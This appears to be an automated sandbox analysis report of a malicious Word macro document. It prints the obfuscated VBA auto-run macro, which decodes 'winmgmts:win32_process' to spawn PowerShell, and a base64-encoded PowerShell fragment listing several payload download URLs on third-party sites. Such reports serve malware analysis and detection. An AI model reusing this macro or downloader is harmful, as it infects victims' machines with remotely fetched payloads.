AGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0
V8w_ubg25ws3wu8wgy
bJfJIBEBC
Paragraphs
Range
Range
UBound
cfmpCCej
MidB$
yFQRXd
Paragraphs
Range
Range
UBound
oVIlzvB
MidB$
XcIBFVflC
Paragraphs
Range
Range
UBound
txnfIE
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
324	Function Lf24kw93f4sab9(Yawumzmq1cyapn)
325	Goto HZrrCCPJ	executed
326	Set YEXZi = noYAHFJkx	noYAHFJkx
327	Dim lZIWVW, SeegFDA, UCtihtI as Long
328	Dim EWwbyEvG as Word.Paragraph
329	Dim ipaAe() as Byte
330	For Each EWwbyEvG in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
331	ipaAe = EWwbyEvG.Range	Range
332	dscc = "sadsaccc" & EWwbyEvG.Range	Range
333	SeegFDA = UBound(ipaAe) - 1	UBound
334	lZIWVW = 0
335	Set yroaOGI = HsCTGA	HsCTGA
336	Do Until SeegFDA > SeegFDA
337	If ipaAe(SeegFDA) = 46 Or SeegFDA = SeegFDA Then
338	dscc = "sasdsacc" & (lZIWVW / 2) + 1 & " to " & (SeegFDA / 2) + 1 & MidB$(ipaAe, lZIWVW + 1, SeegFDA - lZIWVW + 3)	MidB$
339	lZIWVW = SeegFDA + 2
340	Endif
341	SeegFDA = SeegFDA + 2
342	Loop
343	Next	Paragraphs
343	HZrrCCPJ:
345	Goto zvYxeGGBh
346	Set EBcorGpdB = IuiADKc	IuiADKc
347	Dim ZBLQItWK, TyLaL, WygyQ as Long
348	Dim vrXECqWF as Word.Paragraph
349	Dim UApNCTSB() as Byte
350	For Each vrXECqWF in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
351	UApNCTSB = vrXECqWF.Range	Range
352	dscc = "sadsaccc" & vrXECqWF.Range	Range
353	TyLaL = UBound(UApNCTSB) - 1	UBound
354	ZBLQItWK = 0
355	Set PTiWFW = nBWRH	nBWRH
356	Do Until TyLaL > TyLaL
357	If UApNCTSB(TyLaL) = 46 Or TyLaL = TyLaL Then
358	dscc = "sasdsacc" & (ZBLQItWK / 2) + 1 & " to " & (TyLaL / 2) + 1 & MidB$(UApNCTSB, ZBLQItWK + 1, TyLaL - ZBLQItWK + 3)	MidB$
359	ZBLQItWK = TyLaL + 2
360	Endif
361	TyLaL = TyLaL + 2
362	Loop
363	Next	Paragraphs
363	zvYxeGGBh:
365	Goto JQyfEHCFH
366	Set PAPyDG = ukURCshB	ukURCshB
367	Dim ORvhuHGGD, NlrKo, EOBHCBBF as Long
368	Dim UQnFD as Word.Paragraph
369	Dim vLWhdu() as Byte
370	For Each UQnFD in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
371	vLWhdu = UQnFD.Range	Range
372	dscc = "sadsaccc" & UQnFD.Range	Range
373	NlrKo = UBound(vLWhdu) - 1	UBound
374	ORvhuHGGD = 0
375	Set AtZVIBkE = MoAcLJ	MoAcLJ
376	Do Until NlrKo > NlrKo
377	If vLWhdu(NlrKo) = 46 Or NlrKo = NlrKo Then
378	dscc = "sasdsacc" & (ORvhuHGGD / 2) + 1 & " to " & (NlrKo / 2) + 1 & MidB$(vLWhdu, ORvhuHGGD + 1, NlrKo - ORvhuHGGD + 3)	MidB$
379	ORvhuHGGD = NlrKo + 2
380	Endif
381	NlrKo = NlrKo + 2
382	Loop
383	Next	Paragraphs
383	JQyfEHCFH:
385	Lf24kw93f4sab9 = Replace(Yawumzmq1cyapn, "x [ sh b", V8w_ubg25ws3wu8wgy)	Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process V8w_ubg25ws3wu8wgy executed
386	Goto SeochBB
387	Set WmhUJ = bJfJIBEBC	bJfJIBEBC
388	Dim qucrJCEBy, rjilFB, cQXOHIGG as Long
389	Dim TZIFFtB as Word.Paragraph
390	Dim aXyHAY() as Byte
391	For Each TZIFFtB in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
392	aXyHAY = TZIFFtB.Range	Range
393	dscc = "sadsaccc" & TZIFFtB.Range	Range
394	rjilFB = UBound(aXyHAY) - 1	UBound
395	qucrJCEBy = 0
396	Set SeKqFAFNv = cfmpCCej	cfmpCCej
397	Do Until rjilFB > rjilFB
398	If aXyHAY(rjilFB) = 46 Or rjilFB = rjilFB Then
399	dscc = "sasdsacc" & (qucrJCEBy / 2) + 1 & " to " & (rjilFB / 2) + 1 & MidB$(aXyHAY, qucrJCEBy + 1, rjilFB - qucrJCEBy + 3)	MidB$
400	qucrJCEBy = rjilFB + 2
401	Endif
402	rjilFB = rjilFB + 2
403	Loop
404	Next	Paragraphs
404	SeochBB:
406	Goto eFdbX
407	Set UeaVqCIF = yFQRXd	yFQRXd
408	Dim OnZyDDGUB, KUSkBEC, vJOKJuk as Long
409	Dim VADSpA as Word.Paragraph
410	Dim CuSGXNGI() as Byte
411	For Each VADSpA in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
412	CuSGXNGI = VADSpA.Range	Range
413	dscc = "sadsaccc" & VADSpA.Range	Range
414	KUSkBEC = UBound(CuSGXNGI) - 1	UBound
415	OnZyDDGUB = 0
416	Set wMDcH = oVIlzvB	oVIlzvB
417	Do Until KUSkBEC > KUSkBEC
418	If CuSGXNGI(KUSkBEC) = 46 Or KUSkBEC = KUSkBEC Then
419	dscc = "sasdsacc" & (OnZyDDGUB / 2) + 1 & " to " & (KUSkBEC / 2) + 1 & MidB$(CuSGXNGI, OnZyDDGUB + 1, KUSkBEC - OnZyDDGUB + 3)	MidB$
420	OnZyDDGUB = KUSkBEC + 2
421	Endif
422	KUSkBEC = KUSkBEC + 2
423	Loop
424	Next	Paragraphs
424	eFdbX:
426	Goto hSmgtNpln
427	Set bkRdqzBB = XcIBFVflC	XcIBFVflC
428	Dim GcgMIFBS, FTLaqR, zIlgcDbCD as Long
429	Dim VqFNFwx as Word.Paragraph
430	Dim hXmVsAI() as Byte
431	For Each VqFNFwx in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
432	hXmVsAI = VqFNFwx.Range	Range
433	dscc = "sadsaccc" & VqFNFwx.Range	Range
434	FTLaqR = UBound(hXmVsAI) - 1	UBound
435	GcgMIFBS = 0
436	Set eGrznOJJ = txnfIE	txnfIE
437	Do Until FTLaqR > FTLaqR
438	If hXmVsAI(FTLaqR) = 46 Or FTLaqR = FTLaqR Then
439	dscc = "sasdsacc" & (GcgMIFBS / 2) + 1 & " to " & (FTLaqR / 2) + 1 & MidB$(hXmVsAI, GcgMIFBS + 1, FTLaqR - GcgMIFBS + 3)	MidB$
440	GcgMIFBS = FTLaqR + 2
441	Endif
442	FTLaqR = FTLaqR + 2
443	Loop
444	Next	Paragraphs
444	hSmgtNpln:
446	End Function

Function Bcdtdfsryv3bc, APIs: 72, Strings: 24, Number of lines: 86, Relevance: 144.086

APIs	Meta Information
FoVpJCArD
Paragraphs
Range
Range
UBound
aOIKG
MidB$
VSeBJC
Paragraphs
Range
Range
UBound
fHEAXGB
MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: noYAHFJkx
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: HsCTGA
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: IuiADKc
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: nBWRH
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: ukURCshB
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MoAcLJ
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Replace
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: V8w_ubg25ws3wu8wgy
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: bJfJIBEBC
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: cfmpCCej
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: yFQRXd
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: oVIlzvB
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: XcIBFVflC
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: Range
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: txnfIE
Part of subcall function Lf24kw93f4sab9@Dulz0g2a3qqdjsty7: MidB$
gYFIC
Paragraphs
Range
Range
UBound
PlYykHypI
MidB$
beoayAGAs
Paragraphs
Range
Range
UBound
FWzgiHG
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
238	Function Bcdtdfsryv3bc(Ajy4p4krsdew9uay)
239	On Error Resume Next	executed
240	Goto lcxHPB
241	Set RSCoIAgA = FoVpJCArD	FoVpJCArD
242	Dim IZBck, mXwueE, YeeasmCg as Long
243	Dim CBOhDJ as Word.Paragraph
244	Dim gPiUJUCJ() as Byte
245	For Each CBOhDJ in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
246	gPiUJUCJ = CBOhDJ.Range	Range
247	dscc = "sadsaccc" & CBOhDJ.Range	Range
248	mXwueE = UBound(gPiUJUCJ) - 1	UBound
249	IZBck = 0
250	Set aetYHHHFP = aOIKG	aOIKG
251	Do Until mXwueE > mXwueE
252	If gPiUJUCJ(mXwueE) = 46 Or mXwueE = mXwueE Then
253	dscc = "sasdsacc" & (IZBck / 2) + 1 & " to " & (mXwueE / 2) + 1 & MidB$(gPiUJUCJ, IZBck + 1, mXwueE - IZBck + 3)	MidB$
254	IZBck = mXwueE + 2
255	Endif
256	mXwueE = mXwueE + 2
257	Loop
258	Next	Paragraphs
258	lcxHPB:
260	Mpabacff47znxzxgma = Ajy4p4krsdew9uay
261	Goto GRIeHCUTC
262	Set dOQMo = VSeBJC	VSeBJC
263	Dim mbpdgB, BfQqFX, bjyQsJ as Long
264	Dim lroNB as Word.Paragraph
265	Dim iXiRFIE() as Byte
266	For Each lroNB in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
267	iXiRFIE = lroNB.Range	Range
268	dscc = "sadsaccc" & lroNB.Range	Range
269	BfQqFX = UBound(iXiRFIE) - 1	UBound
270	mbpdgB = 0
271	Set dPnKGaIH = fHEAXGB	fHEAXGB
272	Do Until BfQqFX > BfQqFX
273	If iXiRFIE(BfQqFX) = 46 Or BfQqFX = BfQqFX Then
274	dscc = "sasdsacc" & (mbpdgB / 2) + 1 & " to " & (BfQqFX / 2) + 1 & MidB$(iXiRFIE, mbpdgB + 1, BfQqFX - mbpdgB + 3)	MidB$
275	mbpdgB = BfQqFX + 2
276	Endif
277	BfQqFX = BfQqFX + 2
278	Loop
279	Next	Paragraphs
279	GRIeHCUTC:
281	Gzkjanw1nxso6a7rna = Lf24kw93f4sab9(Mpabacff47znxzxgma)
282	Goto NDrVK
283	Set UXwvP = gYFIC	gYFIC
284	Dim rpBOJCg, MDLMBAHzC, IIShQCGJH as Long
285	Dim xeQqnwEGH as Word.Paragraph
286	Dim YRistJGeF() as Byte
287	For Each xeQqnwEGH in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
288	YRistJGeF = xeQqnwEGH.Range	Range
289	dscc = "sadsaccc" & xeQqnwEGH.Range	Range
290	MDLMBAHzC = UBound(YRistJGeF) - 1	UBound
291	rpBOJCg = 0
292	Set TNoCFZI = PlYykHypI	PlYykHypI
293	Do Until MDLMBAHzC > MDLMBAHzC
294	If YRistJGeF(MDLMBAHzC) = 46 Or MDLMBAHzC = MDLMBAHzC Then
295	dscc = "sasdsacc" & (rpBOJCg / 2) + 1 & " to " & (MDLMBAHzC / 2) + 1 & MidB$(YRistJGeF, rpBOJCg + 1, MDLMBAHzC - rpBOJCg + 3)	MidB$
296	rpBOJCg = MDLMBAHzC + 2
297	Endif
298	MDLMBAHzC = MDLMBAHzC + 2
299	Loop
300	Next	Paragraphs
300	NDrVK:
302	Bcdtdfsryv3bc = Gzkjanw1nxso6a7rna
303	Goto beeZpf
304	Set BygJBD = beoayAGAs	beoayAGAs
305	Dim USfrGE, PyJkHIE, tksEqFXE as Long
306	Dim lPbZa as Word.Paragraph
307	Dim euviCGGE() as Byte
308	For Each lPbZa in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
309	euviCGGE = lPbZa.Range	Range
310	dscc = "sadsaccc" & lPbZa.Range	Range
311	PyJkHIE = UBound(euviCGGE) - 1	UBound
312	USfrGE = 0
313	Set SJaMAW = FWzgiHG	FWzgiHG
314	Do Until PyJkHIE > PyJkHIE
315	If euviCGGE(PyJkHIE) = 46 Or PyJkHIE = PyJkHIE Then
316	dscc = "sasdsacc" & (USfrGE / 2) + 1 & " to " & (PyJkHIE / 2) + 1 & MidB$(euviCGGE, USfrGE + 1, PyJkHIE - USfrGE + 3)	MidB$
317	USfrGE = PyJkHIE + 2
318	Endif
319	PyJkHIE = PyJkHIE + 2
320	Loop
321	Next	Paragraphs
321	beeZpf:
323	End Function

Module: Hj8dhqrdh_8498

Declaration

Line	Content
1	Attribute VB_Name = "Hj8dhqrdh_8498"

Module: Sky5mdbfre3xe7q8

Declaration

Line	Content
1	Attribute VB_Name = "Sky5mdbfre3xe7q8"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 89, Strings: 0, Number of lines: 3, Relevance: 135.003

APIs	Meta Information
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: IcgiD
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: wONTemEFr
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: R94sbg0kp8g5
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Content
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Puaskfwqwxz_
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: HmdtGfbHA
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: kVnSBBJ
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: ydHfQ
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: PwKrSn
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: lSvxKAE
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: WolyDl
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: YMkAJIp
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: nZrgFol
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Mid
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Name
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Application
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: NRXsPIGD
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: IwzPAgE
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: HtbOAHKIF
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: BvwhhQNB
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: ezXAHG
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: pWDVU
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: CreateObject
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: HYflxGv
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: dBfQDv
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Mid
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Len
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UvPjdXBJH
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: hrhpx
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Create
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Bf0256837rexe
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: A95ize8agn0fuh
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: fgxZE
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Paragraphs
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: Range
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: UBound
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: tFqUPL
Part of subcall function Ekyjujey2miwyla@Dulz0g2a3qqdjsty7: MidB$

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Ekyjujey2miwyla	executed
11	End Sub

Reset < >

Analysis Process: powershell.exe PID: 1320 Parent PID: 1084 powershell.exeCOMMON

Executed Functions

Function 000007FF00270A01, Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2107612975.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3e31ba993b188beee010cb7d60fd727ab5d6ed69a2c99adb2419ee930354c1
Instruction ID: cf59c7f5af2c820351fb5cff309797d9a8a6241348870a703b23db06b33730ae
Opcode Fuzzy Hash: ac3e31ba993b188beee010cb7d60fd727ab5d6ed69a2c99adb2419ee930354c1
Instruction Fuzzy Hash: 3E71772191E7C28FD75397786CA56A17FF0AF57200B0A01E7D488CB0A3E9599E99C362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00272F45, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2107612975.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b39f449c30a7c7e8e769d247cf6e0298b0a3b1736e71b0162b779d6e338f0d
Instruction ID: d87deac5a56f00663da2952035edcf89673f50679dd2c2f89833a07dc8485b7e
Opcode Fuzzy Hash: c5b39f449c30a7c7e8e769d247cf6e0298b0a3b1736e71b0162b779d6e338f0d
Instruction Fuzzy Hash: 2F51762054EBC20FE35397385C69AB17FB0AF13210B1A00EBD488CF0A3DA585E59D3A3

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00272921, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2107612975.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6da9376574e22f51c7165c9467081c82437132c063fcbb2395c633c04a9611b
Instruction ID: 51c7efecfd0a92a7300a12441ed3bdc423e4d7d890f7dc970799939c48788ab0
